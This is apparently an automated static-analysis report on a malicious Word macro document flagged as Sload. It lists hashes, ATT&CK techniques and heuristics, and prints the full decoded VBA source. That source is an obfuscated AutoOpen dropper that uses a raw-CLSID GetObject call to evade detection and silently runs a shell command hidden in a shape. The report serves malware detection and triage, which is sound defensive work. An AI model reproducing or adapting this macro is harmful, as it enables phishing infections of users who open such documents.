Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9e0b8c46653d577…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 145.4 KB
Created: 2018-11-28 09:45:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 4122bceede6abac8f82d20f5b0bc9a22
SHA-1: 1a4e02a15761c632ccc8f36358359f2da4fcf35e
SHA-256: a9e0b8c46653d577ad42671a47517cdc46ea4c9ee322f3f584537ce9fa5d0e06
Risk Score: 252

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro and the instantiation of the dangerous COM class 'WScript.Shell' indicate that the macro is designed to execute arbitrary code. The heuristic 'SC_STR_POWERSHELL' suggests that PowerShell may be involved in the execution chain, likely to download and run a second-stage payload from a remote source. The presence of a benign URL in the document body does not detract from the malicious nature indicated by the heuristics and macro.

Heuristics (9)

  • ClamAV: Doc.Malware.Sload-6791731-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script (with surrounding context):
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script (with surrounding context):
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script (with surrounding context):
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  8742 bytes

SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case izViuOZ
      Case 268899346
         maoSU = CBool(FvEonQo)
         XoMRQ = 334475000
      Case 245552943
         EalQcfoGw = Atn(ElwQYj)
         icAjK = Atn(119083460 * CLng(36534801))
   End Select
         For Each vwphzIqZv In OhDzZHz
         WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
   On Error Resume Next
Select Case YoNTpTtW
      Case 104436401
         uPFEIBCIR = CBool(jjAECaEnu)
         wPFiKo = 226015111
      Case 299598317
         UoibiaKR = Atn(GWvvSZDr)
         IRPPFbAB = Atn(202386975 * CLng(67058912))
   End Select
         For Each tTSIWwJ In EVisI
         hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
   On Error Resume Next
Select Case CjtjpObWC
      Case 341386355
         lXHNK = CBool(rwjAP)
         bNXwWjG = 85682922
      Case 205692240
         jRarkLJVl = Atn(mNjnDjJ)
         FitzmLSTR = Atn(117835737 * CLng(34744277))
   End Select
         For Each wmavqpnTV In mLPllNik
         nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
   On Error Resume Next
Select Case tHIItZ
      Case 218004345
         bpAZta = CBool(aLiGBW)
         SKmYUdz = 66299889
      Case 80709632
         jlpHMNRl = Atn(zzNvBszwa)
         omfvR = Atn(265656441 * CLng(327590924))
   End Select
         For Each UFDPRdN In HkENzRUGX
         FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
   On Error Resume Next
Select Case NjFXKkiWC
      Case 325245663
         ijjJPh = CBool(GKzSIh)
         hBXUGohOf = 82251888
      Case 24770817
         bnpLULRCi = Atn(czitKTju)
         YXjcjGBwI = Atn(219142162 * CLng(100636164))
   End Select
         For Each UFZGZ In zdGqfM
         ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
   On Error Resume Next
Select Case QKjVz
      Case 43045712
         HBAuhFnUm = CBool(BrnpHObVV)
         jBzcIqZbq = 17823492
      Case 87185052
         CJMtiuw = Atn(VjPiCDpUJ)
         EAbLTGCYm = Atn(280736370 * CLng(209717939))
   End Select
         For Each ijmXoi In NkhWYZz
         UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
   On Error Resume Next
Select Case kPHwU
      Case 188777673
         HAvSTjX = CBool(vjVQMiM)
         VTcqJ = 4474450
      Case 194759069
         wAPHfwhz = Atn(KiXJkNm)
         OaCGW = Atn(79778352 * CLng(160164887))
   End Select
         For Each JmcrlNG In OUTRPzz
         WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
   On Error Resume Next
Select Case WlGaJQQU
      Case 14565301
         pQzVwIHI = CBool(vWZwkfnW)
         HwpjDbVw = 137995964
      Case 212908756
         SbaMIIzwi = Atn(jrvwMNw)
         VuWudNFw = Atn(60217634 * CLng(81824038))
   End Select
         For Each ACnbMPU In NnciqsObF
         jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
   On Error Resume Next
Select Case cczLfVbJ
      Case 176276797
         cJutZFsES = CBool(fiGMAqjv)
         GGQrvnk = 247390719
      Case 201777419
         GGAzwktz = Atn(qhdFhj)
         tVlKo = Atn(251584830 * CLng(211695749))
   End Select
         For Each TpMSzGpT In XMfilH
         HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
   On Error Resume Next
Select Case fHzdMGW
      Case 8242733
         tRjuli = CBool(tKwFtPoC)
         AdrmqkpH = 181229746
      Case 321342769
         ihAzmc = Atn(zABJXFC)
         iwjkPTwzM = Atn(189022450 * CLng(202135788))
   End Select
         For Each aIccTo In FLJBTQ
         qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
Select Case CElfaY
      Case 62706517
         CaRPXKYG = CBool(Jhjtd)
         tzOwHF = 21487974
      Case 92277803
         wcvztY = Atn(bztaJnE)
         vctXm = Atn(226330532 * CLng(228305583))
   End Select
         For Each YqriMa In dzMDQ
         OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
   On Error Resume Next
Select Case LZzww
      Case 169309393
         kimjfz = CBool(DGHzDZqt)
         DaACsStw = 238053714
      Case 209070610
         jWGApIcPp = Atn(JhbTG)
         dtiBRSut = Atn(146135219 * CLng(311932530))
   End Select
         For Each bRpqzAA In jAGHv
         aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
   On Error Resume Next
Select Case BfjhsItP
      Case 201060592
         YVUjLbB = CBool(muQfMlij)
         YjADFbp = 257050929
      Case 220102396
         ilUZkNfSi = Atn(JmoaJFE)
         WTwDIi = Atn(139072756 * CLng(234497440))
   End Select
         For Each VStfwdc In uSUjRhS
         GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
   On Error Resume Next
Select Case rVcHmVwLR
      Case 165092232
         uLpEivEJ = CBool(EOAbhMcA)
         AZzjaHBtL = 327189517
      Case 150085079
         CThUzZpG = Atn(rufKqcVA)
         ZtwTRzh = Atn(72769006 * CLng(249244612))
   End Select
         For Each CpjGnFBu In HimmuG
         iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
   On Error Resume Next
Select Case DjpozQb
      Case 135559299
         fzTwZPK = CBool(wWhWW)
         abzATJwAG = 123948729
      Case 250959929
         uPbwvsO = Atn(hzpwfJ)
         ZIsnw = Atn(219392154 * CLng(276894936))
   End Select
         For Each NzQHLi In rAKwUud
         apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
   On Error Resume Next
Select Case RfXPw
      Case 331273846
         clNNGdiE = CBool(ZkSWaP)
         iVQRMCM = 5533935
      Case 206096767
         wLMaiaF = Atn(JAGJd)
         kiqvqW = Atn(302174151 * CLng(227870935))
   End Select
         For Each Dotjj In ZZMijjT
         luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
   On Error Resume Next
Select Case jXVizq
      Case 283743391
         YUUXWNT = CBool(hipktz)
         LQofBYn = 283266474
      Case 299920648
         lNObiG = Atn(bdoGA)
         lFwHs = Atn(165923603 * CLng(142252333))
   End Select
         For Each VjwKNLL In BldbLkzF
         zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
   On Error Resume Next
Select Case MtwwGaiM
      Case 243799386
         Ntjrk = CBool(hBBMbdsj)
         Ddscij = 105893297
      Case 74548497
         MztjXZjEX = Atn(fBvIcSz)
         jLMjBSdDw = Atn(248919421 * CLng(236078397))
   End Select
         For Each Zzhhf In mzicfWFX
         SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub